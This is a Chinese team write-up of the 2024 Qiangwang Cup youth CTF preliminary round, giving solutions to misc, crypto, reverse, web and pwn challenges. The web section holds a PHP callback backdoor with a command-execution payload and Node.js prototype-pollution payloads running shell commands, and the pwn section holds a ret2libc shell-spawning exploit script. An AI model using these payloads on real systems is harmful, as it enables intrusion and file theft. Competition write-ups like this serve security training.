2024强网杯青少年专项赛初赛团队wp

CTF

2024强网杯青少年专项赛初赛团队wp

战绩:rk11
有幸参加线下赛,但是题目忘了,附件也没有留(

Misc

1.签到漫画

看4幅漫画,得到4个1/4二维码,拼接扫描即可。

2.whitepic

查看文件格式为gif

image-20241124122902265

拆帧

image-20241124122922796

flag{passion_is_the_greatest_teacher}

Crypto

1.Classics

CyberChef逆向,根据加密来解密

image.png

2.AliceAES

根据题目要求用key和vi的AES加密Hello, Bob!

image.png

image.png

3.easymath

根据加密写出解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
from Crypto.Util.number import *
from gmpy2 import next_prime, invert

n = 739243847275389709472067387827484120222494013590074140985399787562594529286597003777105115865446795908819036678700460141950875653695331369163361757157565377531721748744087900881582744902312177979298217791686598853486325684322963787498115587802274229739619528838187967527241366076438154697056550549800691528794136318856475884632511630403822825738299776018390079577728412776535367041632122565639036104271672497418509514781304810585503673226324238396489752427801699815592314894581630994590796084123504542794857800330419850716997654738103615725794629029775421170515512063019994761051891597378859698320651083189969905297963140966329378723373071590797203169830069428503544761584694131795243115146000564792100471259594488081571644541077283644666700962953460073953965250264401973080467760912924607461783312953419038084626809675807995463244073984979942740289741147504741715039830341488696960977502423702097709564068478477284161645957293908613935974036643029971491102157321238525596348807395784120585247899369773609341654908807803007460425271832839341595078200327677265778582728994058920387721181708105894076110057858324994417035004076234418186156340413169154344814582980205732305163274822509982340820301144418789572738830713925750250925049059
c = 229043746793674889024653533006701296308351926745769842802636384094759379740300534278302123222014817911580006421847607123049816103885365851535481716236688330600113899345346872012870482410945158758991441294885546642304012025685141746649427132063040233448959783730507539964445711789203948478927754968414484217451929590364252823034436736148936707526491427134910817676292865910899256335978084133885301776638189969716684447886272526371596438362601308765248327164568010211340540749408337495125393161427493827866434814073414211359223724290251545324578501542643767456072748245099538268121741616645942503700796441269556575769250208333551820150640236503765376932896479238435739865805059908532831741588166990610406781319538995712584992928490839557809170189205452152534029118700150959965267557712569942462430810977059565077290952031751528357957124339169562549386600024298334407498257172578971559253328179357443841427429904013090062097483222125930742322794450873759719977981171221926439985786944884991660612824458339473263174969955453188212116242701330480313264281033623774772556593174438510101491596667187356827935296256470338269472769781778576964130967761897357847487612475534606977433259616857569013270917400687539344772924214733633652812119743

e = 65537
l = 2331

def count_sequences(n):
    dp = [{} for _ in range(n+1)]
    dp[1][(1,1)] = 1

    for pos in range(1, n):
        dp_next = {}
        for state, count in dp[pos].items():
            last_bit, consec_count = state
            # 添加0
            if last_bit == 0:
                if consec_count < 3:
                    new_state = (0, consec_count + 1)
                    dp_next[new_state] = dp_next.get(new_state, 0) + count
            else:
                new_state = (0, 1)
                dp_next[new_state] = dp_next.get(new_state, 0) + count
            # 添加1
            if last_bit == 1:
                if consec_count < 3:
                    new_state = (1, consec_count + 1)
                    dp_next[new_state] = dp_next.get(new_state, 0) + count
            else:
                new_state = (1, 1)
                dp_next[new_state] = dp_next.get(new_state, 0) + count
        dp[pos + 1] = dp_next

    # 累加所有合法状态的计数
    key = 0
    for state, count in dp[n].items():
        last_bit, consec_count = state
        if last_bit == 1 and consec_count <= 3:
            key += count
    return key

key = count_sequences(l)

p = int(next_prime(key))
q = n // p

phi = (p - 1) * (q - 1)
d = invert(e, phi)

m = pow(c, d, n)
flag = long_to_bytes(m)
print(flag.decode())

flag{77310934-21fa-4ee4-a783-dc1865ebab28}

Reverse

1.EnterGame

分析main函数,找到加密函数和加密后的flag→s2

image.png

分析加密函数

image.png

a3为用户输入的flag,a4是加密flag→s2

动调可以提取v16的值,并写异或解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
unsigned char v16[] =
{
  0x38, 0x7F, 0xCB, 0xB4, 0xFC, 0x46, 0x13, 0x4F, 0x22, 0x27, 
  0x31, 0xC2, 0x2D, 0x53, 0x25, 0xB4, 0x58, 0x6F, 0x75, 0x74, 
  0x67, 0x20, 0x53, 0x74, 0x71, 0x65, 0x6E, 0x67, 0x73, 0x68, 
  0x65, 0x6E, 0x9A, 0xE4, 0x9E, 0xB8, 0x86, 0xCF, 0x69, 0x3F, 
  0xAA, 0xBC, 0x94, 0x90, 0x84, 0xDD, 0xFE, 0xFF, 0xFF, 0xFF, 
  0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2F, 0x31, 0x32, 0x33, 
  0x33, 0x35, 0x36, 0x37, 0x60
};

unsigned char enflag[] =
{
  0x5E, 0x13, 0xAA, 0xD3, 0x87, 0x75, 0x2B, 0x7A, 0x1B, 0x16, 
  0x04, 0xA3, 0x49, 0x7E, 0x1D, 0xD2, 0x6B, 0x5D, 0x58, 0x40, 
  0x5E, 0x44, 0x63, 0x59, 0x48, 0x51, 0x0D, 0x54, 0x5E, 0x58, 
  0x55, 0x58, 0xAD, 0x82, 0xAF, 0xDC, 0xE7, 0xAB, 0x58, 0x5D, 
  0xCE, 0xC1, 0x32
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include <stdio.h>

int main() {
    int i, j;
    char flag[100];
unsigned char v16[] =
{
  0x38, 0x7F, 0xCB, 0xB4, 0xFC, 0x46, 0x13, 0x4F, 0x22, 0x27,
  0x31, 0xC2, 0x2D, 0x53, 0x25, 0xB4, 0x58, 0x6F, 0x75, 0x74,
  0x67, 0x20, 0x53, 0x74, 0x71, 0x65, 0x6E, 0x67, 0x73, 0x68,
  0x65, 0x6E, 0x9A, 0xE4, 0x9E, 0xB8, 0x86, 0xCF, 0x69, 0x3F,
  0xAA, 0xBC, 0x94, 0x90, 0x84, 0xDD, 0xFE, 0xFF, 0xFF, 0xFF,
  0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x2F, 0x31, 0x32, 0x33,
  0x33, 0x35, 0x36, 0x37, 0x60
};

unsigned char enflag[] =
{
  0x5E, 0x13, 0xAA, 0xD3, 0x87, 0x75, 0x2B, 0x7A, 0x1B, 0x16,
  0x04, 0xA3, 0x49, 0x7E, 0x1D, 0xD2, 0x6B, 0x5D, 0x58, 0x40,
  0x5E, 0x44, 0x63, 0x59, 0x48, 0x51, 0x0D, 0x54, 0x5E, 0x58,
  0x55, 0x58, 0xAD, 0x82, 0xAF, 0xDC, 0xE7, 0xAB, 0x58, 0x5D,
  0xCE, 0xC1, 0x32
};

for ( i = 0; i < 42; i += 64 )
  {
       for ( j = 0; j <= 63 && 42 > i + j; ++j )
      *(char *)(i + j + flag) = v16[j] ^ *(char *)(i + j + enflag);
  }
    printf("%s\n",flag);
    return 0;
}

flag{385915ad-8f32-49d0-94c3-0067f1dad1bd}

2.Flip_over

jadx发现加载了lib,并且对用户输入进行check

image.png

来到so文件

image.png

发现加密函数

rc4

des加密

最后异或加密

提取数据

image.png

丢进赛博厨子

image.png

出flag

Web

1.ezGetFlag

网页源码中发现一个backend.php,

image.png

点击网页按钮提示

image.png

所以使用post方法访问backend.php

即可得到flag

2.ezFindShell

在1de9d9a55a824f4f8b6f37af76596baa.php发现post

image-20241124192413375

存在漏洞代码

1
2
$e=$_REQUEST['e'];$arr=array($_POST['POST'],);array_filter($arr,base64_decode($e));
?>

base64_decode($e)的结果作为回调函数,可能导致任意代码执行

构造post:POST=system(“cat /flag”)&e=YXNzZXJ0

image-20241124193833136

3.cyberboard

src中均为js文件,联想到原型链污染

在src中发现admin,登录

cyber1

image-20241124183400276

在Message.js中的save方法使用JSON.parse解析输入,可以尝试原型链污染

image-20241124184015039

尝试payload:

{"content":"123","__proto__":{"block": {"type":"Text","line":"process.mainModule.require('child_process').exec('whoami')"}}}

发现没有回显,尝试写入文件

payload:

{"__proto__":{"block":{"type":"Text","line":"process.mainModule.require('child_process').execSync('cat /f* > /app/public/aaaaaa.txt')"}}}

访问url/aaaaa.txt

image-20241124184851340

PWN

1.clock_in

查看保护

image-20241124143848587

fgets读取长度远大于s,可以溢出

image-20241124143725859

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *

#io=process("./clock_in")
io=remote("123.56.237.38", 28685)

payload = b"A"*(64+8) + p64(0x4011C5) + p64(0x403FD8) + p64(0x401060) + p64(0X401207)
io.sendline(payload)
A=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

log.info(f"A: {hex(A)}")
libc = ELF("./libc.so.6")
libc_base = A - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b"/bin/sh"))
payload =  b"A"*(64+8) + p64(0x4011C5) +  p64(binsh) + p64(system)
io.sendline(payload)
io.interactive()